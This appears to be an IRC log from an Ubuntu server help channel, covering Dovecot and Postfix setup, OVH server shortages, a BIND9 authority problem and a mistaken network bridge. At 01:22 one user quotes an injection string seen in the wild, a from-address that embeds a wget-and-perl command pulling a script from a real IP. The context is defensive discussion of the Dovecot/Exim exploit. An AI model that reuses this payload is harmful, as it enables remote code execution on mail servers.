[00:39] <brad9001> hello all, I just set up dovecot and I wanted to see what email client you guys would recommend because I dont like thunderbird
[00:41] <Pastafarian> matter of personal taste.
[00:41] <Pastafarian> I've only used outlook and thunderbird. I stick to the latter.
[00:41] <brad9001> well I can never get thunderbird to work and it pisses me off because i love it for my gmail accounts
[00:42] <brad9001> Ill look into outlook though
[00:42] <Pastafarian> in terms of more than a email client outlook is fantastic
[00:42] <Pastafarian> but it's more suited to business work, meetings, calendar etc...
[00:43] <Pastafarian> works fine as an email client
[00:44] <brad9001> oh, well what would you reccomend besides thunderbird?
[00:45] <Pastafarian> besides outlook, no idea
[00:45] <Pastafarian> never used anything
[00:45] <Pastafarian> you might want to look into mailpile if you are interested in encryption
[00:51] <brad9001> ok will do thanks @pastafarian
[01:11] <brad9001> @pastafarian you there? would you mind helping me with dovecot-postfix setup?
[01:15] <Pastafarian> Sorry, I haven't done dovecot before.
[01:15] <Pastafarian> There are a few good guides knocking around on the ubuntu wiki somewhere.
[01:17] <ScottK> The configuration in Ubuntu Server Guide (see /topic) works.
[01:17] <Pastafarian> I am not entirely sure that the implementation there is secure
[01:18] <Pastafarian> There was a recent dovecot exploit that worked and there was no imput sanitisation on dovecot when it got stuff passed from postfix
[01:18] <Pastafarian> they could run arbitrary commands by embeding them into the headers of the email
[01:18] <ScottK> Link?
[01:18] <Pastafarian> reply to address I seem to remember
[01:18] <Pastafarian> one second, it might not apply here, I need to find the link
[01:19] <Pastafarian> I saw them try to do it on my mail server, but I am not using dovecot
[01:22] <Pastafarian> the offending string itself was the from address
[01:22] <Pastafarian> from=<x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}188.130.34.244/p``perl${IFS}/tmp/p.pl`@blaat.co$
[01:24] <ScottK> Interesting.
[01:24] <ScottK> I don't think there's anything in the way one configures dovecot that would affect if it did input validation on the From address or not.
[01:25] <Pastafarian> I remember the link saying it was the return path
[01:26] <Pastafarian> that something when passed executed this
[01:26] <Pastafarian> It might have been an EXIM dovecot config however
[01:26] <Pastafarian> trying to find the original email as that is from my emails to the relevant abuse@ addresses
[01:32] <Pastafarian> ScottK, https://isc.sans.edu/diary/Dovecot++Exim+Exploit+Detects/16243
[01:33] <ScottK> Thanks.
[01:33] <ScottK> Shouldn't be a problem with postfix/lmtp.
[01:33] <Pastafarian> indeed
[01:33] <Pastafarian> Rusty memory
[01:33] <Pastafarian> that being said, they imply the default config for exim and dovecot is the cause
[01:33] <Pastafarian> which is worrying
[01:34] <Pastafarian> I reported that to 3 different businesses and got no replies from any of them.
[01:34] <Pastafarian> all of them directly responsible for providing this hacker with services
[01:36] <ScottK> I wonder if it had a CVE.
[01:36] <Pastafarian> I don't think it did at the time but I cannot be sure about that
[01:37] <Pastafarian> either way the logs are misleading
[01:37] <Pastafarian> the email contained no From:
[01:37] <Pastafarian> only the reply-to:
[01:37] <Pastafarian> the headers themselves on that mail gave it away
[01:53] <Pastafarian> ScottK, server guide doesnt cover courier which is surprising
[02:05] <LargePrime> how tangential a discussion are we allowed hear?
[02:05] <LargePrime> like i hear ovh is out of servers
[02:05] <Pastafarian> is that even possible?
[02:05] <LargePrime> and am looking for mor info
[02:06] <Pastafarian> They're a hosting company
[02:06] <Pastafarian> they'd just buy more servers
[02:06] <LargePrime> It seems they have no servers?
[02:06] <Pastafarian> seems unlikely
[02:06] <LargePrime> intell stopped making the CPU they use
[02:06] <Pastafarian> they'd just tide over using EC2 or something
[02:06] <Pastafarian> LargePrime, that isn't going to stop them.
[02:06] <LargePrime> well the sp packages are now at 72 hours till available
[02:07] <Pastafarian> They'll just use a different CPU
[02:07] <LargePrime> but i hear that after you order they are taking weeks to fill
[02:07] <Pastafarian> seems unlikely for such a large company to have screwed it up that badly
[02:07] <LargePrime> but all this is hearsay
[02:07] <LargePrime> thats why i bug people like yous
[02:07] <LargePrime> But the SP1's used to fill in 20 min flat
[02:08] <LargePrime> and the web site now say 72 hours
[02:08] <LargePrime> and there are a few web acounts of others not getting servers for weeks
[02:09] <Pastafarian> well, it's not impossible for it to happen
[02:09] <Pastafarian> but it's like hearing that amazon ec2 ran out of servers
[02:11] <LargePrime> http://forum.ovh.co.uk/showthread.php?t=7176
[02:12] <Pastafarian> ha
[02:12] <Pastafarian> every time I look at VPS's I cringe
[02:12] <Pastafarian> so expensive
[02:12] <Pastafarian> I have a geolocated octacore with 16gb of RAM for free
[02:12] <Pastafarian> if I wanted something similar from a VPS host I am looking at 10k annually
[02:13] <Pastafarian> Gotta love universities eh?
[10:04] <Fire> Anyone can give me a hand with bind9 config im having issues with.
[10:07] <Fire> Im probably just forgetting something really stupid.
[10:45] <Fire> Anyone can give me a hand with bind9 issue - using Dig it resolves but when pointed to webserver it doesnt
[10:45] <ikonia> when pointed at a webserver ?
[10:46] <Fire> As in i pointed my domain name to my server with NS records; but it wotn resolve
[10:46] <ikonia> you just said it resolved with dig
[10:46] <Fire> when I ssh internally it resolves
[10:46] <ikonia> Fire: is this domain name on the public internet
[10:46] <Fire> yes
[10:47] <ikonia> what is the domain name
[10:47] <Fire> moddl.com
[10:47] <ikonia> Name Server: KS200136.KIMSUFI.COM
[10:47] <ikonia> Name Server: NS.KIMSUFI.COM
[10:47] <ikonia> Name Server: NS11.OVH.NET
[10:47] <ikonia> are they your name servers ?
[10:47] <Fire> thats correct
[10:47] <ikonia> Fire: what is the FQDN you are trying to resolve
[10:49] <Fire> *.moddl.com.
[10:49] <ikonia> can you give me a valid host
[10:49] <ikonia> eg: test01.moddl.com
[10:50] <ikonia> when did you update these records ?
[10:50] <Fire> few hours ago - was trying to get just moddl.com. to work first then ill fiddle with subdomains
[10:50] <ikonia> ok, so it's probably not propogated yet
[10:50] <ikonia> as my dns server is showing no records
[10:50] <Fire> never had the issue before
[10:52] <ikonia> I can't get a response from ns.kimsufi.com
[10:52] <sgran> Fire: when I ask your nameservers directly, none of them respond with an soa record
[10:52] <Fire> hmm
[10:52] <Fire> its first time ive tried to setup dns on a kimsufi/ovh
[10:52] <ikonia> Fire: it's showing they are not soa
[10:53] <ikonia> and I can't do recursion, so it rejects me
[10:53] <sgran> ns.kimsufi.com and ns11.ovh.net give me 'recursion requested but not available' and ks200136.kimsufi.com does not answer
[10:53] <ikonia> sgran: confirmed
[10:53] <sgran> I'd suggest that you have not configured them to be authoritative for the domain?
[10:54] <ikonia> seems the logical conclusion
[10:54] <Fire> let me check
[10:54] <Fire> am pretty sure i did
[10:59] <Fire> 38200755
[10:59] <Fire> moddl.com.      IN      SOA     ns1.moddl.com. admin.moddl.com. (
[11:07] <Fire> any other ideas
[11:07] <Fire> Im thinking about just changing the records at the registrar
[11:33] <Fire> sgran any other ideas
[11:34] <sgran> Fire: the .com registrar says that moddl.com is served by kimsufi/ovh
[11:34] <Fire> It is
[11:34] <sgran> I think the simplest is going to be letting kisufi/ovh know about this
[11:34] <Fire> Kimsufi support are beyond useless
[11:36] <sgran> hmm.  This begs the question - why are you using them? :)
[11:37] <Fire> Cheap :)
[11:37] <Fire> Ridicuolously so in fact
[11:38] <sgran> I might be seeing why
[11:38] <Fire> I used 2 kimsufis in the past as seedboxes - if you are peering mostly to europe / canada its crazy good value
[11:38] <sgran> in fact, I'm going to set up a new business
[11:38] <sgran> pay me £5/year, and I'll pretend to host DNS for you
[11:39] <sgran> of course, I won't actually do anything but collect your money
[11:39] <sgran> but it will be cheap :)
[11:39] <Fire> To put it in perspective i transferred ~25TB in a month.
[11:39] <Fire> which for £6.30 for 2 servers is quite good value
[11:41] <Fire> For my business i use elsewhere - but I dont really wanna spend £60/month for a personal server for tinkering
[13:12] <Nox_404> Hi, i made a mistake, on an ubuntu server 12.04 i create a bridge between eth0 and another bridge (i wrote the wrong iface) so now i can't reconnect this server ! (using ssh). If i reboot the server will my connection be back ?
[13:14] <Nox_404> please answer me
[13:15] <bekks> Nox_404: Do you have any other chance other than rebooting now?
[13:16] <Nox_404> bekks: thats a remote server and i don't have any other way to connect this server
[13:17] <bekks> Then you have no other option left.
[13:17] <bekks> So it doesnt matter what we tell you, you have to reboot.
[13:18] <Nox_404> bekks: ok so i'll try that
[13:18] <Nox_404> bekks: thanks
[13:18] <bekks> Thank yourself ;)
[13:24] <patdk-lap> how would we know if a reboot would help?
[13:25] <patdk-lap> you lacked to tell us how to did it, what files you modified.
[13:25] <bekks> There is no other chance than rebooting.
[13:26] <Nox_404> patdk-lap: I used `brctl addif iface iface`
[13:28] <bekks> Nox_404: So did you reboot it?
[13:29] <Nox_404> bekks: I have to wait for a friend to reboot it, like i said i don't have access to this server
[13:29] <Nox_404> bekks: I must wait for tonight ....
[13:29] <bekks> Nox_404: Does your friend have physical access?
[13:29] <Nox_404> bekks: yes
[13:30] <bekks> So there even is a way to fix it if rebooting doesnt help.
[13:30] <bekks> You should have told us about those details.
[13:30] <Nox_404> bekks: but he doesn't know anything about ubuntu..
[13:30] <bekks> You can tell him what he needs to do.
[13:30] <bekks> You can screw his server, you can tell him to reboot it - so you can tell him what to do. :)
[13:31] <Nox_404> i just wanted to know if rebooting is enouth to fix it
[13:31] <bekks> we dont know.
[17:53] <plasmen> hello
[17:53] <plasmen> can you help me with something
[17:53] <plasmen> I am missing the 250-AUTH LOGIN PLAIN and 250-AUTH=LOGIN PLAIN
[17:54] <plasmen> any ideas?
[18:40] <Nox_404> bekks: My friend reboot it and it works fine, brctl doesn't keep the configuration after a reboot